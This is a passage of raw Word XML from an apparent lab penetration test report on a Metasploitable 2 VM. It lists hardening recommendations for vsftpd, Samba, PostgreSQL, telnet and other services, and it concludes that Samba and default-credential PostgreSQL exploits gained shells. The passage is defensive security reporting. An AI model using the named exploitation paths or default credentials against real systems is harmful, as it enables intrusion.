          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.2  Critical / Immediate Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">REC-01: Remove or Isolate Metasploitable Root Bind Shell (Port 1524)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The root bind shell on TCP/1524 provides unauthenticated root access to any connecting client. In a real-world environment, this would require an immediate incident response. In a lab context, ensure the Metasploitable VM is never accessible from outside the designated isolated lab network.</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Block TCP/1524 at the firewall perimeter immediately</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Investigate whether this port has been accessed by any unauthorised party</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In production: treat as an active compromise and initiate incident response procedures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">REC-02: Patch or Replace vsftpd 2.3.4 (CVE-2011-2523)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The vsftpd 2.3.4 backdoor represents a Critical, remotely exploitable vulnerability. The affected package should be immediately replaced.</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Disable the FTP service on port 21 if it is not required (preferred)</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If FTP is required, replace vsftpd 2.3.4 with a current, supported version (vsftpd 3.0.5+)</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Migrate FTP users to SFTP (SSH File Transfer Protocol) for encrypted file transfer</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Apply the principle of least privilege — configure FTP access to authorised users and IP ranges only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">REC-03: Patch Samba to Address CVE-2007-2447</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba 3.0.20 is vulnerable to the usermap_script command injection. This vulnerability was successfully exploited during this assessment.</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Immediately upgrade Samba from 3.0.20 to a current supported version (Samba 4.17+)</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If upgrading is not immediately possible, remove or disable the "username map script" configuration option</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Restrict SMB access (ports 139 and 445) to authorised internal IP addresses via firewall rules</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Disable anonymous SMB access and enforce authentication for all shares</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">REC-04: Change Default PostgreSQL Credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The PostgreSQL service was exploited using default credentials (postgres:postgres). Default credentials represent a critical configuration weakness.</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Immediately change the postgres user password to a strong, randomly generated credential (minimum 16 characters)</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Restrict PostgreSQL access (port 5432) to localhost only (configure pg_hba.conf to deny remote connections)</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Review all PostgreSQL user accounts and remove any accounts not actively required</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Implement PostgreSQL connection logging to monitor for brute-force or unauthorised access attempts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.3  High Priority Actions (Within 7 Days)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">REC-05: Disable Telnet; Replace with SSH (Port 23)</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Immediately disable the telnetd service: sudo systemctl disable telnet.socket &amp;&amp; sudo systemctl stop telnet.socket</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Ensure OpenSSH is configured and accessible on port 22</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Upgrade OpenSSH from version 3.5p1 to a current supported release (OpenSSH 9.x)</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Enforce SSH key-based authentication; disable password-based SSH login</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Apply SSH rate limiting to prevent brute-force attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">REC-06: Disable Legacy Remote Access Services (Ports 512–514)</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Disable rexec (512), rlogin (513), and rsh (514) services immediately</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These services provide no security benefit over SSH and should not exist on any modern system</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Remove associated packages: sudo apt-get remove rsh-server rsh-client</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Apply firewall rules to block these ports even if the services cannot be immediately removed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">REC-07: Restrict NFS and Database Service Exposure</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Restrict NFS (2049) exports using /etc/exports — only export to authorised hosts with minimum required permissions</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Restrict MySQL (3306) to listen on localhost only: set bind-address = 127.0.0.1 in /etc/mysql/my.cnf</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Change default MySQL root password and remove anonymous user accounts</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Review and disable ProFTPD (2121) if not required; if required, upgrade and secure the configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">REC-08: Remove or Isolate UnrealIRCd 3.2.8.1 (CVE-2010-2075)</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Remove or disable the UnrealIRCd service running on port 6667</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If an IRC service is required, replace with a current, maintained IRC server distribution</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Block port 6667 at the network firewall to prevent external access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.4  Medium Priority Actions (Within 30 Days)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">REC-09: Harden Apache HTTP and Tomcat Services</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Update Apache HTTP Server to a currently supported version with all security patches applied</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Configure Tomcat Manager (/manager) with strong, non-default credentials and restrict access to trusted IP addresses only</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Disable or mitigate the AJP connector (port 8009) — see CVE-2020-1938 (Ghostcat) for AJP exploitation risks</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Remove or restrict access to default Tomcat web applications (examples, manager, host-manager)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">REC-10: Secure VNC Remote Desktop Access (Port 5900)</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Require strong VNC authentication — upgrade from VNC Protocol 3.3 to a version supporting encrypted authentication</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Restrict VNC access to trusted IP addresses via firewall rules or VPN</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Consider replacing VNC with a more secure remote desktop protocol (e.g., RDP over TLS, or SSH X11 forwarding)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.5  Long-Term and Architectural Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">REC-11: Establish a Patch Management Process</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Implement a formal, recurring patch management cycle for all software components</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Subscribe to security advisories for all deployed software (NVD, vendor bulletins)</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Track software versions against CVE databases and maintain a current asset inventory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">REC-12: Implement Network Segmentation and Firewall Controls</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Apply the principle of least exposure — only expose services that are required for operational purposes</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Implement host-based firewall rules (iptables / ufw) to restrict service access to authorised sources</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Segment the network to prevent lateral movement between hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">REC-13: Deploy Monitoring and Detection Capabilities</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Implement centralised logging (syslog, auditd) to capture authentication events and service access</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Deploy an Intrusion Detection System (IDS) such as Snort or Suricata to monitor for exploitation attempts</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Conduct periodic vulnerability assessments to verify that remediation actions have been effective</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Establish a re-test schedule: perform a follow-up penetration test within 60–90 days to validate remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="420" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">9.  Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">9.1  Summary of Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This penetration test assessed the security posture of a single-host Metasploitable 2 laboratory virtual machine (10.0.2.9) using Nmap 7.95 and the Metasploit Framework. The engagement successfully demonstrated the complete penetration testing lifecycle, from initial reconnaissance through to authorised exploitation and evidence-based reporting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Nmap service enumeration scan identified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">23 open TCP services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target host, revealing a comprehensive and highly exposed attack surface. Subsequent vulnerability analysis mapped multiple services to known CVEs with Critical and High severity ratings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Two of the three exploitation attempts were successful:</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The Samba usermap_script module (CVE-2007-2447) established a command shell session — demonstrating Remote Code Execution (RCE) via an unauthenticated network service</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The PostgreSQL payload module established a Meterpreter session — demonstrating the real-world impact of default credential exposure on database services</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The Apache Tomcat WAR upload attempt failed due to inaccessibility of the Tomcat Manager interface — however, this does not confirm the service is secure and further assessment is recommended</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">9.2  Security Posture Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The overall security posture of the assessed system is rated as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
